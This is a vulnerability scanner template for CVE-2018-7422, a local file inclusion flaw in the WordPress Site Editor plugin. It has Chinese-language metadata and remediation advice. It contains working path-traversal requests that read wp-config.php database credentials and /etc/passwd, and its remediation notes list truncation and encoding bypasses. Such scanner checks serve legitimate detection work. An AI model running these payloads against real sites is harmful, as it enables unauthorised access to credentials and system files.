id: CVE-2018-7422
info:
  name: WordPress Site Editor Plugin LFI
  author:
  - l0ne1y
  tags:
  - cve
  - cve2018
  - wordpress
  - wp-plugin
  - lfi
  description: |-
    WordPress Plugin Site Editor 存在本地文件包含漏洞
    WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。Site Editor plugin是使用在其中的一个所见即所得的前端编辑器。

    WordPress Site Editor插件1.1.1及之前版本中存在本地文件包含漏洞。远程攻击者可通过向editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php文件发送‘ajax_path’参数利用该漏洞检索任意文件。
  reference:
  - https://www.exploit-db.com/exploits/44340
  - http://seclists.org/fulldisclosure/2018/mar/40
  - https://wpvulndb.com/vulnerabilities/9044
  - https://www.exploit-db.com/exploits/44340/
  severity: high
  classification:
    cve-id:
    - cve-2018-7422
    cwe-id:
    - cwe-22
    - cwe-829
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：https://wordpress.org/plugins/site-editor/

    临时修复方案：
    1、PHP 中使用 open_basedir 配置限制访问在指定的区域，路径长短截断
    2、过滤.（点）/（反斜杠）\\（反斜杠），编码绕过
    3、禁止服务器远程文件包含
    4、对于限制了包含文件后缀的情况，PHP版本小于5.3，php.ini magic_quotes_gpc = off，对可控参数未使用addslashes函数，满足这三个条件就可以使用%00截断。
    5、问号、井号、空格绕过（远程）
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - DB_NAME
    - DB_PASSWORD
  - type: regex
    part: body
    regex:
    - 'root:.*:0:0:'
  matchers-condition: or
  path:
  - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
  - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd'
  method: GET
